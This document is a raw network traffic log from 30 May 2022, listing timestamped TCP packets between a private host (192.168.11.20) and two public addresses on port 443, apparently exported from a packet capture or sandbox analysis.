May 30, 2022 14:45:08.546240091 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.546262026 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.546268940 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.546283007 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.546391964 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.546505928 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.546519041 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.546540022 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.546572924 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.546679020 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.546691895 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.546741962 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.546749115 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.546761990 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.546832085 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.546850920 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.546855927 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.546881914 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.546899080 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.546924114 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.546930075 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.546945095 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547029972 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.547048092 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547097921 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547128916 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.547183990 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547209978 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.547226906 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547336102 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547344923 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.547430992 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547471046 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.547476053 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547487020 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547605038 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547624111 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.547645092 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547732115 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.547750950 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547801971 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547867060 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.547883987 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.547992945 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.547996998 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548146009 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548166037 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548227072 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548238993 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548254967 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548290014 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548314095 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548320055 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548338890 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548387051 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548403025 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548480034 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548486948 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548577070 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548593998 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548625946 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548738956 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548758030 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548763037 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548773050 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548901081 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548918962 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548949957 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.548949957 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.548966885 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.549108028 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.549117088 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.549189091 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.549206018 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.549287081 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.549349070 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.549355030 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.549397945 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.551075935 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.551223993 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.551407099 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.551476002 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.551584959 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.551604986 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.551626921 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.551709890 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.551712990 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.551755905 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.551834106 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.551872969 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.551889896 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.551934958 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.551950932 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.551984072 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.551997900 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.552043915 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.552052021 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.552067995 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.552090883 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.552095890 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:08.552169085 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.552179098 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.552274942 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.552490950 CEST	49738	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:08.552505970 CEST	443	49738	142.250.185.65	192.168.11.20
May 30, 2022 14:45:57.502159119 CEST	49767	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:57.502238989 CEST	443	49767	142.250.186.110	192.168.11.20
May 30, 2022 14:45:57.502413988 CEST	49767	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:57.530536890 CEST	49767	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:57.530582905 CEST	443	49767	142.250.186.110	192.168.11.20
May 30, 2022 14:45:57.562589884 CEST	443	49767	142.250.186.110	192.168.11.20
May 30, 2022 14:45:57.562779903 CEST	49767	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:57.565802097 CEST	443	49767	142.250.186.110	192.168.11.20
May 30, 2022 14:45:57.566030025 CEST	49767	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:57.572016954 CEST	49767	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:57.572751999 CEST	443	49767	142.250.186.110	192.168.11.20
May 30, 2022 14:45:57.572879076 CEST	49767	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:57.579282045 CEST	49767	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:57.622633934 CEST	443	49767	142.250.186.110	192.168.11.20
May 30, 2022 14:45:57.952250004 CEST	443	49767	142.250.186.110	192.168.11.20
May 30, 2022 14:45:57.952419996 CEST	49767	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:57.952449083 CEST	443	49767	142.250.186.110	192.168.11.20
May 30, 2022 14:45:57.952495098 CEST	443	49767	142.250.186.110	192.168.11.20
May 30, 2022 14:45:57.952649117 CEST	49767	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:57.952744007 CEST	49767	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:57.952780008 CEST	443	49767	142.250.186.110	192.168.11.20
May 30, 2022 14:45:58.006859064 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.006871939 CEST	443	49768	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.007039070 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.007337093 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.007344007 CEST	443	49768	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.036250114 CEST	443	49768	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.036396027 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.036444902 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.036447048 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.036900997 CEST	443	49768	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.037090063 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.044848919 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.044972897 CEST	443	49768	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.045105934 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.045445919 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.086632967 CEST	443	49768	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.184497118 CEST	443	49768	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.184676886 CEST	443	49768	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.184750080 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.184830904 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.184959888 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.185015917 CEST	443	49768	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.185029030 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.185156107 CEST	49768	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.370279074 CEST	49769	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:58.370368004 CEST	443	49769	142.250.186.110	192.168.11.20
May 30, 2022 14:45:58.370578051 CEST	49769	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:58.370861053 CEST	49769	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:58.370913982 CEST	443	49769	142.250.186.110	192.168.11.20
May 30, 2022 14:45:58.404546022 CEST	443	49769	142.250.186.110	192.168.11.20
May 30, 2022 14:45:58.404690981 CEST	49769	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:58.405049086 CEST	49769	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:58.405400038 CEST	49769	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:58.405550003 CEST	443	49769	142.250.186.110	192.168.11.20
May 30, 2022 14:45:58.913074017 CEST	443	49769	142.250.186.110	192.168.11.20
May 30, 2022 14:45:58.913254976 CEST	443	49769	142.250.186.110	192.168.11.20
May 30, 2022 14:45:58.913362980 CEST	49769	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:58.913427114 CEST	49769	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:58.913570881 CEST	49769	443	192.168.11.20	142.250.186.110
May 30, 2022 14:45:58.913616896 CEST	443	49769	142.250.186.110	192.168.11.20
May 30, 2022 14:45:58.914463997 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.914547920 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.914699078 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.915050983 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.915112019 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.946705103 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:58.946903944 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.947618961 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.948044062 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:58.948160887 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.172943115 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.173237085 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.173258066 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.173290014 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.173523903 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.173911095 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.174081087 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.174122095 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.174820900 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.175096035 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.175247908 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.175379038 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.175455093 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.175503016 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.175517082 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.175627947 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.175820112 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.180569887 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.180797100 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.180857897 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.181005955 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.181112051 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.181157112 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.181180954 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.181232929 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.181337118 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.181379080 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.181574106 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.181605101 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.181732893 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.181930065 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.181951046 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.182061911 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.182301998 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.182529926 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.182694912 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.182718992 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.182881117 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.182907104 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.183119059 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.183269978 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.183417082 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.183454990 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.183686972 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.183717012 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.183872938 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.183975935 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.184123993 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.184138060 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.184286118 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.184298992 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.184442043 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.184739113 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.184906960 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.184921026 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.185061932 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.185079098 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.185230970 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.185460091 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.185617924 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.185631990 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.185786963 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.185854912 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.185889006 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.185941935 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.186032057 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.186105967 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.186249971 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.186280966 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.186429977 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.186455965 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.186615944 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.186644077 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.186832905 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.187118053 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.187338114 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.187366962 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.187519073 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.188504934 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.188766003 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.188910961 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.188954115 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.188991070 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.189150095 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.189176083 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.189197063 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.189214945 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.189342976 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.189353943 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.189379930 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.189488888 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.189507008 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.189522028 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.189773083 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.189821959 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.189966917 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.190000057 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.190135002 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.190146923 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.190177917 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.190264940 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.190351963 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.190372944 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.190396070 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.190576077 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.190613031 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.190803051 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.191044092 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.191045046 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.191082954 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.191226959 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.191255093 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.191402912 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.191436052 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.191464901 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.191593885 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.191668034 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.191694021 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.191874027 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.191888094 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.191911936 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.192076921 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.192099094 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.192115068 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.192265034 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.192296028 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.192313910 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.192421913 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.192433119 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.192445040 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.192604065 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.192629099 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.192645073 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.192800999 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.192819118 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.192835093 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.192981005 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.193084002 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.193270922 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.193305016 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.193444014 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.193449974 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.193478107 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.193572998 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.193639040 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.193660975 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.193852901 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.193881035 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.194036007 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.194075108 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.194231033 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.194253922 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.194415092 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.194421053 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.194447041 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.194610119 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.194653988 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.194675922 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.194818020 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.194844961 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.194993019 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.196147919 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.196321011 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.196357965 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.196501017 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.196507931 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.196540117 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.196736097 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.196815968 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.196846008 CEST	443	49770	142.250.185.65	192.168.11.20
May 30, 2022 14:45:59.196886063 CEST	49770	443	192.168.11.20	142.250.185.65
May 30, 2022 14:45:59.196985960 CEST	49770	443	192.168.11.20	142.250.185.65
